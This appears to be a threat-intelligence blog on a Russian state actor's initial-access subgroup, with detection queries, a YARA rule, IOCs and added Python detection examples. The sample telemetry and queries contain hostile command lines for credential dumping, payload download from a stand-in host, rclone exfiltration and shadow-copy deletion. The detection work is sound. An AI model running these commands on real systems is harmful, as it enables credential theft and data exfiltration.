In early 2024, the initial access subgroup began using RMM suites, a technique Seashell Blizzard had not previously used to achieve persistence and command and control (C2). This was first observed when the subgroup exploited vulnerabilities in ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet FortiClient EMS (CVE-2023-48788). The subgroup then deployed RMM software such as Atera Agent and Splashtop Remote Services. The use of RMM software allowed the threat actor to retain critical C2 functions while masquerading as a legitimate utility, which made it less likely to be detected than a remote access trojan (RAT). While these TTPs have been used by other nation-state threat actors since at least 2022, including by Iranian state actor Mango Sandstorm, the Seashell Blizzard initial access subgroup’s specific techniques are considered distinct.
Figure 3. Use of ScreenConnect to install Atera Agent
During the first weeks of this exploitation pattern, the initial access subgroup primarily targeted organizations in Ukraine, the United States, Canada, the United Kingdom, and Australia. It is highly likely that Seashell Blizzard conducted post-compromise activity at only a limited number of organizations that were part of this initial victim pool. For these organizations, Seashell Blizzard conducted preliminary credential access through multiple means and deployed at least one custom utility to facilitate remote access and tunneling (see the section on ShadowLink below for more information).
Both CVE-2024-1709 and CVE-2023-48788 provided the ability to launch arbitrary commands on a vulnerable server. Following exploitation, the subgroup used two methods of payload retrieval to install RMM agents on affected servers:
- Retrieval of Atera Agent installers from legitimate agent endpoints – Commonly observed on exploited ScreenConnect servers, Seashell Blizzard used resulting command execution to retrieve Atera installers via Bitsadmin and curl from legitimate installation URLs hosted by Atera.
- Retrieval of Atera Agent from actor-controlled infrastructure – During exploitation of CVE-2023-48788 between April 9 and April 10, 2024, Seashell Blizzard retrieved remote agent installers from actor-controlled virtual private server (VPS) infrastructure.
Following installation of RMM software, Seashell Blizzard uses the native functionality of the agents to deploy secondary tools that support credential acquisition, data exfiltration, and the upload of custom utilities to facilitate more robust access to compromised systems.
Seashell Blizzard likely uses three primary methods of credential access:
- Registry-based credential access via reg.exe:
- Credential access via renamed procdump:
- Since RMM agents typically afford an interactive graphical interface, native credential access mechanisms such as dumping the LSASS process from the Task Manager UI were likely also employed.
During Seashell Blizzard intrusions, we observed rclone.exe deployed to affected servers and subsequently used to carry out data exfiltration using an actor-supplied configuration file.
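To make the post-RMM chain above concrete from the detection side, here is an added Python example (not code from the report) that runs a few rules over constructed process-creation records shaped like DeviceProcessEvents: RMM installer retrieval by a ScreenConnect child process, reg.exe hive export, an LSASS dump by a renamed procdump-style tool, and rclone run with a supplied config. The hostnames, URLs, paths and the renamed image name are assumptions.

```python
import json
import re

# Constructed sample telemetry (not real logs): one JSON object per line, shaped loosely like
# DeviceProcessEvents with the ancestor images (oldest first), the image name and the command line.
# Hostnames, URLs, paths and the renamed procdump image name (svchost32.exe) are all made up.
SAMPLE_EVENTS = r"""
{"host":"mail01","ancestors":["services.exe","ScreenConnect.ClientService.exe","cmd.exe"],"file":"bitsadmin.exe","cmd":"bitsadmin /transfer upd /download /priority high https://agent-dl.example/AteraAgent.msi C:\\Windows\\Temp\\a.msi"}
{"host":"mail01","ancestors":["services.exe","ScreenConnect.ClientService.exe","cmd.exe"],"file":"curl.exe","cmd":"curl -sko C:\\Windows\\Temp\\s.exe https://203.0.113.10/splashtop_streamer.exe"}
{"host":"mail01","ancestors":["AteraAgent.exe","cmd.exe"],"file":"reg.exe","cmd":"reg save hklm\\sam C:\\Windows\\Temp\\sam.hiv"}
{"host":"mail01","ancestors":["AteraAgent.exe","cmd.exe"],"file":"reg.exe","cmd":"reg save hklm\\system C:\\Windows\\Temp\\sys.hiv"}
{"host":"mail01","ancestors":["AteraAgent.exe","cmd.exe"],"file":"svchost32.exe","cmd":"svchost32.exe -accepteula -ma lsass.exe C:\\Windows\\Temp\\l.dmp"}
{"host":"mail01","ancestors":["AteraAgent.exe","cmd.exe"],"file":"rclone.exe","cmd":"rclone copy C:\\Shares\\Finance remote:drop --config C:\\Windows\\Temp\\r.conf"}
{"host":"ws07","ancestors":["explorer.exe","cmd.exe"],"file":"reg.exe","cmd":"reg query hklm\\software\\microsoft\\windows\\currentversion\\run"}
{"host":"ws07","ancestors":["explorer.exe"],"file":"certutil.exe","cmd":"certutil -hashfile C:\\Downloads\\setup.exe SHA256"}
"""

RMM_MARKERS = ("atera", "splashtop")
DOWNLOADERS = {"bitsadmin.exe", "curl.exe", "wget.exe", "certutil.exe", "powershell.exe"}
# reg.exe exporting a credential-bearing hive (the "registry-based credential access" item above)
HIVE_EXPORT_RE = re.compile(r"\bsave\b.*\bhklm\\(sam|system|security)\b", re.I)
# procdump-style switches aimed at LSASS; the image name is ignored on purpose because the tool is renamed
LSASS_DUMP_RE = re.compile(r"-(?:ma|mm|accepteula)\b.*\blsass\b", re.I)


def classify(event):
    """Return the names of the rules a single process-creation event triggers."""
    hits = []
    cmd = event["cmd"].lower()
    image = event["file"].lower()
    ancestors = [a.lower() for a in event["ancestors"]]
    if ("screenconnect.clientservice.exe" in ancestors and image in DOWNLOADERS
            and "http" in cmd and any(marker in cmd for marker in RMM_MARKERS)):
        hits.append("rmm_installer_fetch_via_screenconnect")
    if image == "reg.exe" and HIVE_EXPORT_RE.search(cmd):
        hits.append("registry_hive_export")
    if LSASS_DUMP_RE.search(cmd):
        hits.append("lsass_dump_procdump_style")
    if image == "rclone.exe" and "--config" in cmd:
        hits.append("rclone_with_supplied_config")
    return hits


def detect(jsonl_text):
    """Run every rule over JSON-lines telemetry; one finding per (event, rule) pair."""
    findings = []
    for line in jsonl_text.strip().splitlines():
        event = json.loads(line)
        for rule in classify(event):
            findings.append({"host": event["host"], "rule": rule,
                             "image": event["file"], "cmd": event["cmd"]})
    return findings


def chain_summary(findings):
    """Hosts on which two or more distinct stages fired, i.e. the post-RMM chain rather than a lone hit."""
    stages_by_host = {}
    for f in findings:
        stages_by_host.setdefault(f["host"], set()).add(f["rule"])
    return {host: sorted(rules) for host, rules in stages_by_host.items() if len(rules) >= 2}


if __name__ == "__main__":
    results = detect(SAMPLE_EVENTS)
    for f in results:
        print(f'{f["host"]:8} {f["rule"]:40} {f["image"]}')
    print("chained hosts:", chain_summary(results))
```

The benign ws07 records (a reg query and a certutil hash check, the same exclusion the ScreenConnect hunting query below carries) produce no findings, while mail01 shows all four stages.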
Among a subgroup of victims, Seashell Blizzard carried out unique post-compromise activity, indicating that the threat actor sought more durable persistence and direct access. In these cases, Seashell Blizzard deployed OpenSSH with a unique public key, allowing them to access compromised systems using an actor-controlled account and credential, in addition to a unique persistence and assured C2 method known to Microsoft Threat Intelligence as ShadowLink.
Figure 4. How ShadowLink avoids discovery
ShadowLink facilitates persistent remote access by configuring a compromised system to be registered as a Tor hidden service. This is achieved using a combination of Tor service binaries and a unique actor-defined Tor configuration file (referred to as the ‘torrc’) that configures the system for remote access. Systems compromised with ShadowLink receive a unique .onion address, making them remotely accessible via the Tor network. This capability allows Seashell Blizzard to bypass the common pattern of deploying a RAT, which typically relies on some form of C2 to actor-controlled infrastructure that is often easily audited and identified by network administrators. Instead, by relying on Tor hidden services, the compromised system creates a persistent circuit to the Tor network that acts as a covert tunnel, effectively cloaking all inbound connections to the affected asset and limiting exposure of both the actor and victim environment.
ShadowLink contains two primary components: a legitimate Tor service binary and a torrc that contains the requisite configuration for the Tor hidden service address, specifically port forwarding for common services such as Remote Desktop Protocol (RDP) and Secure Shell (SSH). Commonly, Seashell Blizzard has used ShadowLink to redirect inbound connections to the Tor hidden service address to the RDP port (3389). ShadowLink persisted via a system service:
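A defender's check for a torrc of the shape just described, as an added Python example that is not from the report or from the Tor project: it groups HiddenServicePort lines under the HiddenServiceDir that precedes them, as Tor does, and reports any hidden service that forwards an .onion port to a local remote-access service. The sample torrc and its directory paths are constructed.

```python
REMOTE_ACCESS_PORTS = {3389: "RDP", 22: "SSH", 5985: "WinRM", 5986: "WinRM over HTTPS"}

# Constructed sample torrc in the ShadowLink shape described above; not an actor sample,
# and the directory paths are made up.
SAMPLE_TORRC = r"""
# comment lines are ignored
DataDirectory C:\ProgramData\NetSvc\data
HiddenServiceDir C:\ProgramData\NetSvc\hs1
HiddenServicePort 3389 127.0.0.1:3389
HiddenServicePort 22
HiddenServiceDir C:\ProgramData\NetSvc\hs2
HiddenServicePort 80 127.0.0.1:8080
SocksPort 0
"""


def parse_hidden_services(torrc_text):
    """Group each HiddenServicePort under the HiddenServiceDir that precedes it, as Tor does.

    Returns a list of {"dir": str, "ports": [{"virtual": int, "host": str, "port": int|None}]}.
    A HiddenServicePort with no target maps to 127.0.0.1 on the same port (Tor's default);
    a unix: target is recorded with port None.
    """
    services = []
    for raw in torrc_text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()                   # torrc option names are case-insensitive
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "hiddenservicedir":
            services.append({"dir": value, "ports": []})
        elif key == "hiddenserviceport":
            if not services:
                raise ValueError("HiddenServicePort appears before any HiddenServiceDir")
            fields = value.split()
            virtual = int(fields[0])
            target = fields[1] if len(fields) > 1 else str(virtual)
            if target.startswith("unix:"):
                host, port = target, None
            else:
                host, _, port_text = target.rpartition(":")
                host, port = (host or "127.0.0.1"), int(port_text)
            services[-1]["ports"].append({"virtual": virtual, "host": host, "port": port})
    return services


def find_exposed_remote_access(torrc_text):
    """Report hidden services that forward an .onion port to a local remote-access service."""
    findings = []
    for svc in parse_hidden_services(torrc_text):
        sep = "\\" if "\\" in svc["dir"] else "/"
        for p in svc["ports"]:
            if p["port"] in REMOTE_ACCESS_PORTS:
                findings.append({
                    "hidden_service_dir": svc["dir"],
                    "onion_port": p["virtual"],
                    "target": f'{p["host"]}:{p["port"]}',
                    "service": REMOTE_ACCESS_PORTS[p["port"]],
                    # Tor writes the generated .onion name to <dir>/hostname; collect it as evidence
                    "hostname_file": svc["dir"].rstrip("\\/") + sep + "hostname",
                })
    return findings


if __name__ == "__main__":
    for hit in find_exposed_remote_access(SAMPLE_TORRC):
        print(f'{hit["service"]:6} onion:{hit["onion_port"]} -> {hit["target"]}  ({hit["hostname_file"]})')
```

On a live host the torrc path comes from the service's command line (the Tor service detection query later in this post finds the service itself), and the hostname file gives responders the .onion address to block or hunt for.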
Microsoft Threat Intelligence has also observed Forest Blizzard, a separate GRU actor, leveraging similar Tor-based capabilities in their operations.
Web shell deployment for persistence and C2 (late 2021 – present)
Since late 2021, the Seashell Blizzard initial access subgroup has primarily deployed web shells following successful exploitation to maintain footholds and achieve the ability to execute commands necessary to deploy secondary tooling to assist lateral movement. To date, this exploit pattern remains its predominant persistence method. Beginning in mid-2022, this pattern of exploitation enabled unique post-compromise activities against organizations in Central Asia and Europe, which were likely intended to further Russia’s geopolitical objectives and preposition against select strategic targets.
Figure 5. Seashell Blizzard exploitation of CVE-2021-34473 and CVE-2022-41352
Exploitation of Microsoft Exchange and Zimbra vulnerabilities
Microsoft Threat Intelligence has identified at least two web shells consistently deployed by this initial access subgroup. While web shells can be deployed using a variety of methods, they are most often deployed following the exploitation of vulnerabilities allowing remote code execution (RCE) or achieving some level of arbitrary file upload. In the case of the initial access subgroup, we have observed web shells deployed following exploitation of vulnerabilities in Microsoft Exchange (CVE-2021-34473) and Zimbra (CVE-2022-41352). In cases where RCE is available, the initial access subgroup routinely retrieves web shells from actor-controlled infrastructure. This infrastructure can be either legitimate but compromised websites or dedicated actor infrastructure.
We observed the following web shell retrieval commands being used:
Microsoft Threat Intelligence has identified a web shell that we assess as exclusive to the initial access subgroup and that is associated with the web shell retrieval patterns mentioned above. Detected as LocalOlive, this web shell is found on compromised perimeter infrastructure and serves as the subgroup’s primary means of achieving C2 and deploying additional utilities to compromised infrastructure. Written in ASPX with C#, the web shell carries sufficient yet rudimentary functionality to support the following secondary activities:
- Upload and download files
- Run shell commands
- Open a port (default port is set to TCP 250)
Figure 6. LocalOlive web shell def.aspx
On October 24, 2022, the initial access subgroup successfully exploited CVE-2022-41352. This Zimbra Collaboration vulnerability allows a threat actor to deploy web shells and other arbitrary files by sending an email with a specially crafted attachment, effectively exploiting an arbitrary file-write vulnerability. The initial access subgroup leveraged this vulnerability to deliver a primitive web shell to affected servers, allowing for execution of arbitrary commands.
Emails were sent from the following actor-controlled addresses:
- akfcjweiopgjebvh@proton.me
- ohipfdpoih@proton.me
- miccraftsor@outlook.com
- amymackenzie147@protonmail.ch
- ehklsjkhvhbjl@proton.me
- MirrowSimps@outlook.com
Figure 7. Web shell used during Zimbra exploitation
Reconnaissance and fingerprinting
After deploying web shells, the initial access subgroup then executes the specific sequence of commands below, likely used to fingerprint and attribute victim networks; these patterns of behavior may indicate either that operators are quick to capitalize on compromises or that automation is used following successful exploitation.
Tunneling utilities deployment
When Seashell Blizzard identifies targets of likely strategic value, it often furthers its network compromise by deploying tunneling utilities such as Chisel, plink, and rsockstun to establish dedicated conduits into affected network segments.
When Chisel is deployed, it has often followed multiple naming conventions, including:
- MsChSoft.exe
- MsNan.exe
- Msoft.exe
- Chisel.exe
- Win.exe
- MsChs.exe
- MicrosoftExchange32.exe
- Desk.exe
- Sys.exe
For example, the initial access subgroup has used the following tunneling commands:
When rsockstun is deployed, it has used naming conventions such as Sc.exe.
Tunneling launch
When establishing tunnels, the initial access subgroup has routinely established reverse tunnels to exclusive VPS actor-owned infrastructure, including:
| Tunneling IP | First observed used | Last observed used |
| --- | --- | --- |
| 103.201.129[.]130 | May 2022 | July 2022 |
| 104.160.6[.]2 | September 2022 | December 2022 |
| 195.26.87[.]209 | September 2023 | April 2024 |

Note that these IP addresses are relevant within or around the timeframes enumerated in the table above. Some IP addresses may no longer be used by Seashell Blizzard at the time of this writing but are provided for historical and forensic understanding.
Modification of infrastructure to expand network influence through credential collection (late 2021 – 2024)
In targeted operations where the initial access subgroup is likely seeking network access, Microsoft Threat Intelligence has observed subsequent malicious modifications to network resources including Outlook Web Access (OWA) sign-in pages and DNS configurations.
Figure 8. Simple attack chain for Seashell Blizzard exploitation of OWA
Modifying network resources allows Seashell Blizzard to passively gather relevant network credentials, which may be used to expand the actor’s access to sensitive information and widen its access to target networks in general. Notably, the infrastructure associated with this unique technique is sometimes also used in the two prior exploitation patterns, highlighting the versatility of late-stage infrastructure which may not always be limited to distinct patterns of exploitation.
Modification of web access sign-in portals
The initial access subgroup uses rogue JavaScript inserted into otherwise legitimate sign-in portals. This malicious JavaScript collects and sends clear text usernames and passwords to actor-controlled infrastructure as they are submitted in real time by users of the affected organization. We assess that this method has likely afforded the subgroup credentials to support lateral movement within several organizations.
Microsoft Threat Intelligence has tracked the following actor-controlled infrastructure linked to this unique credential collection method when modifying legitimate OWA sign-in pages:
- hwupdates[.]com
- cloud-sync[.]org
- 103.201.129[.]130
Microsoft Threat Intelligence assesses with moderate confidence that the initial access subgroup has modified DNS A record configurations for select targets. While the purpose of these modifications is unclear, due to the nature of affected systems, it is possible that they may have been purposed to intercept credentials from critical authentication services.
Conclusion
Given that Seashell Blizzard is Russia’s cyber tip of the spear in Ukraine, Microsoft Threat Intelligence assesses that this access subgroup will continue to innovate new horizontally scalable techniques to compromise networks both in Ukraine and globally in support of Russia’s war objectives and evolving national priorities. This subgroup, which is characterized within the broader Seashell Blizzard organization by its near-global reach, represents an expansion in both the geographical targeting conducted by Seashell Blizzard and the scope of its operations. At the same time, Seashell Blizzard’s far-reaching, opportunistic access methods likely offer Russia expansive opportunities for niche operations and activities that will continue to be valuable over the medium term.
Mitigation and protection guidance
To harden networks against the Seashell Blizzard activity listed above, defenders can implement the following:
Strengthen operating environment configuration
- Utilize a vulnerability management system, such as Microsoft Defender Vulnerability Management, to manage vulnerabilities, weaknesses, and remediation efforts across your environment’s operating systems, software inventories, and network devices.
- Require multifactor authentication (MFA). While certain attacks such as AiTM phishing attempt to circumvent MFA, implementation of MFA remains an essential pillar in identity security and is highly effective at stopping a variety of threats.
- Leverage phishing-resistant authentication methods such as FIDO Tokens, or Microsoft Authenticator with passkey. Avoid telephony-based MFA methods to avoid risks associated with SIM-jacking.
- Implement Entra ID Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.
- Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
- Organizations can also use Microsoft Defender External Attack Surface Management (EASM), a tool that continuously discovers and maps your digital attack surface to provide an external view of your online infrastructure. EASM leverages vulnerability and infrastructure data to generate Attack Surface Insights, reporting that highlights key risks to a given organization.
- Enable Network Level Authentication for Remote Desktop Service connections.
- Enable AppLocker to restrict specific software tools prohibited within the organization, such as reconnaissance, fingerprinting, and RMM tools, or grant access to only specific users.
- Ensure that tamper protection is enabled in Microsoft Defender for Endpoint.
- Enable network protection in Microsoft Defender for Endpoint.
- Turn on web protection.
- Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- Microsoft Defender XDR customers can turn on the following attack surface reduction rules to prevent common attack techniques used by threat actors.
- Block executable content from email client and webmail
- Block executable files from running unless they meet a prevalence, age, or trusted list criterion
- Block execution of potentially obfuscated scripts
- Block JavaScript or VBScript from launching downloaded executable content
- Block process creations originating from PSExec and WMI commands
- Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
- Enable Microsoft Defender Antivirus scanning of downloaded files and attachments.
- Enable Microsoft Defender Antivirus real-time protection.
- Turn on PUA protection in block mode in Microsoft Defender Antivirus.
- Turn on Safe Links and Safe Attachments in Microsoft Defender for Office 365.
- Enable Zero-hour auto purge (ZAP) in Microsoft Defender for Office 365 to quarantine sent mail in response to newly acquired threat intelligence and retroactively neutralize malicious phishing, spam, or malware messages that have already been delivered to mailboxes.
- Invest in advanced anti-phishing solutions that monitor incoming emails and visited websites. Microsoft Defender for Office 365 merges incident and alert management across email, devices, and identities, centralizing investigations for email-based threats.
- Configure Microsoft Defender for Office 365 to recheck links on click.
- Use the Attack Simulator in Microsoft Defender for Office 365 to run realistic, yet safe, simulated phishing and password attack campaigns. Run spear-phishing (credential harvest) simulations to train end-users against clicking URLs in unsolicited messages and disclosing credentials.
- Prevent clear text credential exposure.
- Reduce lateral movement paths that may be used by attackers.
- Identify legacy components that may introduce security vulnerabilities.
Microsoft Defender Antivirus detects this threat as the following malware:
- HackTool:Win64/ShadowLink.A!dha
- HackTool:Win64/ShadowLink.B!dha
- Exploit:Python/CVE-2024-1709
- Ransom:Win32/Inc.MA
- BackDoor:PHP/Remoteshell.V
- Trojan:Win32/LocalOlive.A!dha
- Trojan:Win32/LocalOlive.B!dha
- Trojan:Win32/LocalOlive.C!dha
The following Microsoft Defender for Endpoint alerts can indicate associated threat activity:
- Seashell Blizzard activity group
The following alerts might also indicate threat activity related to this threat. Note, however, these alerts also can be triggered by unrelated threat activity.
- Possible Seashell Blizzard activity
- Suspicious Atera installation via ScreenConnect
- Suspicious command execution via ScreenConnect
- Suspicious sequence of exploration activities
- CredentialDumpingViaEsentutlDetector
- Suspicious behavior by cmd.exe was observed
- SQL Server login using xp_cmdshell
- Suspicious port scan activity within an RDP session
- Suspicious connection to remote service
- Suspicious usage of remote management software
- New local admin added using Net commands
- Sensitive data was extracted from registry
- Suspicious Scheduled Task Process Launched
- Potential human-operated malicious activity
- Compromised account conducting hands-on-keyboard attack
- Sensitive file access for possible data exfiltration or encryption
- Possible Fortinet FortiClientEMS vulnerability exploitation
- Possible target of NTLM credential theft
- Possible exploitation of ProxyShell vulnerabilities
- Possibly malicious use of proxy or tunneling tool
- Hidden dual-use tool launch attempt
The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.
- Communication with suspicious domain identified by threat intelligence
- Suspicious PowerShell Activity Detected
- Detected suspicious combination of HTA and PowerShell
- Detected encoded executable in command line data
- Detected obfuscated command line
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments. Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence to get more information about this threat actor.
Microsoft Defender Threat Intelligence
- Seashell Blizzard
- Seashell Blizzard uses new ShadowLink variant
- Seashell Blizzard exploiting vulnerabilities to install Atera Agent for post-compromise activities
- Seashell Blizzard launches destructive attack against local Ukrainian government, Storm-1512 takes credit
- Credential Theft via Modification of Outlook Web Access (OWA) Login Pages
- Seashell Blizzard Targeting Zimbra Servers Using Malicious Email Attachment
- Seashell Blizzard Uses TOR Hidden Services on Targets for Persistence and Evasion
The following sample queries let you search for a week’s worth of events. To explore up to 30 days’ worth of raw data to inspect events in your network and locate potential PowerShell-related indicators for more than a week, go to the Advanced hunting page > Query tab, select the calendar dropdown menu to update your query to hunt for the Last 30 days.
ScreenConnect
Surface the possible exploitation of ScreenConnect to launch suspicious commands.
DeviceProcessEvents
| where InitiatingProcessParentFileName endswith "ScreenConnect.ClientService.exe"
| where (FileName in~ ("powershell.exe", "powershell_ise.exe", "cmd.exe") and ProcessCommandLine has_any ("System.DirectoryServices.ActiveDirectory.Domain", "hidden -encodedcommand", "export-registry", "compress-archive", "wget -uri", "curl -Uri", "curl -sko", "ipconfig /all", "& start /B", "start msiexec /q /i", "whoami", "net user", "net group", "localgroup administrators", "dsquery", "samaccountname=", "query session", "adscredentials", "o365accountconfiguration", "-dumpmode", "-ssh"))
    // the has_any list above is cut off after "-ssh" in the source page; at least one further entry is missing
    or (FileName =~ "wget.exe" and ProcessCommandLine contains "http")
    or (FileName =~ "mshta.exe" and ProcessCommandLine contains "http")
    or (FileName =~ "curl.exe" and ProcessCommandLine contains "http")
    or ProcessCommandLine has_all ("powershell", "-command", "curl")
    or ProcessCommandLine has_any ("E:jscript", "e:vbscript", "start msiexec /q /i")
    or ProcessCommandLine has_all ("reg add", "DisableAntiSpyware", @"\Microsoft\Windows Defender")
    or ProcessCommandLine has_all ("reg add", "DisableRestrictedAdmin", @"CurrentControlSet\Control\Lsa")
    or ProcessCommandLine has_all ("vssadmin", "delete", "shadows")
    or ProcessCommandLine has_all ("vssadmin", "list", "shadows")
    or ProcessCommandLine has_all ("wmic", "process call create")
    or ProcessCommandLine has_all ("wmic", "delete", "shadowcopy")
    or ProcessCommandLine has_all ("wmic", "shadowcopy", "call create")
    or ProcessCommandLine has_all ("wbadmin", "delete", "catalog")
    or ProcessCommandLine has_all ("ntdsutil", "create full")
    or (ProcessCommandLine has_all ("schtasks", "/create") and not(ProcessCommandLine has "shutdown"))
    or (ProcessCommandLine has "nltest" and ProcessCommandLine has_any ("domain_trusts", "dclist", "all_trusts"))
    or (ProcessCommandLine has "lsass" and ProcessCommandLine has_any ("procdump", "tasklist", "findstr"))
    or FileName in~ ("tasklist.exe", "ssh.exe", "icacls.exe", "certutil.exe", "calc.exe", "bitsadmin.exe", "accesschk.exe", "mshta.exe", "winrm.exe", "dsquery.exe", "makecab.exe", "hh.exe", "pcalua.exe", "regsvr32.exe", "cmstp.exe", "esentutl.exe", "dnscmd.exe", "gpscript.exe", "msdt.exe", "msra.exe", "odbcconf.exe")
| where not(ProcessCommandLine has_any ("servicedesk.atera.com", "support.csolve.net", "lt.tech-keys.com", "certutil -hashfile"))

FortiClient EMS log capture
If you believe your FortiClient has been exploited before patching, this query may help with further investigation.
According to Horizon3 research, the C:\Program Files (x86)\Fortinet\FortiClientEMS\logs log file can be examined to identify malicious activity. Run the following query to surface devices with this log file for further investigation.
DeviceFileEvents
| where FolderPath contains @"C:\Program Files (x86)\Fortinet\FortiClientEMS\logs"
| distinct DeviceName

Additionally, Horizon3 noted that this SQL vulnerability could allow for remote code execution (RCE) using the xp_cmdshell functionality of Microsoft SQL Server. The SQL logs can also be examined for evidence of xp_cmdshell being leveraged to spawn a Windows command shell.
According to Microsoft research, the following query could help surface exploitation activity related to this vulnerability.
DeviceProcessEvents
| where InitiatingProcessFileName == "sqlservr.exe"
| where FileName =~ "cmd.exe"
| where ProcessCommandLine has_any ("webclient", "downloadstring", "http", "https", "downloadfile")
| where InitiatingProcessCommandLine has_all ("sqlservr.exe", "-sFCEMS")

Tor service
Find services associated with Tor.
DeviceEvents
| where ActionType == 'ServiceInstalled'
| extend JSON = parse_json(AdditionalFields)
| where JSON.ServiceName has 'tor'

YARA rule
Use the following Yara rule to find malicious JavaScript inserted into OWA sign-in pages.
rule injected_cred_logger_owa
{
    strings:
        $owa = "<!-- OwaPa"
        $jq = "jquery"
        $ajax = ".ajax"
        $keypress = ".keypress"
        $which = "e.which == 13"
        $encoding1 = "btoa"
        $encoding2 = "unescape"
        $encoding3 = "encodeURIComponent"
        $m1 = "GET"
        $m2 = "POST"
    condition:
        $owa and $jq and $ajax and $keypress and $which and (2 of ($encoding*)) and (1 of ($m*))
}

Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
While the below query is not linked to any specific threat actor, it is effective in surfacing network connectivity that may indicate use of remote monitoring and management program ScreenConnect. Implementing this query can help you stay vigilant and safeguard your organization from unauthorized use of RMM software:
Below are the queries using Sentinel ASIM Functions to hunt threats across both Microsoft first-party and third-party data sources. ASIM also supports deploying parsers to specific workspaces from GitHub, using an ARM template or manually.
The following query can be used to hunt normalized Network Session events using the ASIM unifying parser _Im_NetworkSession for IOCs:
The following query can be used to hunt normalized Web Session events using the ASIM unifying parser _Im_WebSession for IOCs:
let lookback = 30d;
let ioc_ip_addr = dynamic(["103.201.129.130", "104.160.6.2", "195.26.87.209"]);
let ioc_url_patterns = dynamic(["hwupdates.com", "cloud-sync.org", "def.aspx"]);
_Im_WebSession(starttime=todatetime(ago(lookback)), endtime=now())
| where Url has_any (ioc_url_patterns) or DstIpAddr has_any (ioc_ip_addr)
| summarize imWS_mintime=min(TimeGenerated), imWS_maxtime=max(TimeGenerated), EventCount=count() by SrcIpAddr, DstIpAddr, Url, Dvc, EventProduct, EventVendor

References
- https://nvd.nist.gov/vuln/detail/CVE-2024-1709
- https://nvd.nist.gov/vuln/detail/CVE-2023-48788
- https://www.cisa.gov/news-events/ics-alerts/ir-alert-h-16-056-01
- https://www.justice.gov/opa/pr/six-russian-gru-officers-charged-connection-worldwide-deployment-destructive-malware-and
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd
- https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains
- https://cloud.google.com/blog/topics/threat-intelligence/trojanized-windows-installers-ukrainian-government
- https://cert.gov.ua/article/6278706
- https://cloud.google.com/blog/topics/threat-intelligence/apt44-unearthing-sandworm
- https://nvd.nist.gov/vuln/detail/CVE-2021-34473
- https://nvd.nist.gov/vuln/detail/CVE-2022-41352
- https://nvd.nist.gov/vuln/detail/CVE-2023-32315
- https://nvd.nist.gov/vuln/detail/CVE-2023-42793
- https://nvd.nist.gov/vuln/detail/CVE-2023-23397
- https://medium.com/@laurent.mandine/chisel-the-hackers-hidden-tunnel-for-stealthy-network-access-acdcdaafeabd
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
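The same IOC hunt carried out outside Sentinel, as an added example that is not the blog's own code: a small Python matcher that refangs the published indicators and applies the filter and summarize steps of the query above to constructed normalized web session rows. The case-insensitive substring match is an assumption that approximates KQL has_any.

```python
from collections import defaultdict

# IOC values from the hunting query, written defanged ("[.]") the way they
# appear in published IOC tables, so the matcher has to refang them first.
IOC_IP_ADDRS = ["103.201.129[.]130", "104.160.6[.]2", "195.26.87[.]209"]
IOC_URL_PATTERNS = ["hwupdates[.]com", "cloud-sync[.]org", "def.aspx"]

# Constructed sample rows shaped like ASIM WebSession output (not real telemetry).
SAMPLE_EVENTS = [
    {"TimeGenerated": "2025-01-10T10:00:00Z", "SrcIpAddr": "10.0.0.5",
     "DstIpAddr": "104.160.6.2", "Url": "http://104.160.6.2/update", "Dvc": "proxy01"},
    {"TimeGenerated": "2025-01-10T10:05:00Z", "SrcIpAddr": "10.0.0.5",
     "DstIpAddr": "104.160.6.2", "Url": "http://104.160.6.2/update", "Dvc": "proxy01"},
    {"TimeGenerated": "2025-01-10T11:00:00Z", "SrcIpAddr": "10.0.0.9",
     "DstIpAddr": "93.184.216.34", "Url": "https://HWUPDATES.com/x.bin", "Dvc": "proxy01"},
    {"TimeGenerated": "2025-01-10T12:00:00Z", "SrcIpAddr": "10.0.0.9",
     "DstIpAddr": "93.184.216.34", "Url": "https://example.com/", "Dvc": "proxy01"},
]


def refang(indicator: str) -> str:
    """Turn a defanged indicator ("1.2.3[.]4", "hxxp://") back into a usable one."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


def hunt(events, ip_iocs=IOC_IP_ADDRS, url_iocs=IOC_URL_PATTERNS):
    """Mirror the KQL hunt: keep rows whose Url contains any URL IOC or whose
    DstIpAddr is an IOC address, then summarize first seen, last seen and a
    count per (SrcIpAddr, DstIpAddr, Url, Dvc).

    Assumption: substring matching stands in for KQL has_any, which matches
    whole terms and is therefore stricter than this check.
    """
    ips = {refang(i) for i in ip_iocs}
    patterns = [refang(p).lower() for p in url_iocs]
    hits = defaultdict(list)
    for ev in events:
        url_hit = any(p in ev["Url"].lower() for p in patterns)
        ip_hit = ev["DstIpAddr"] in ips
        if url_hit or ip_hit:
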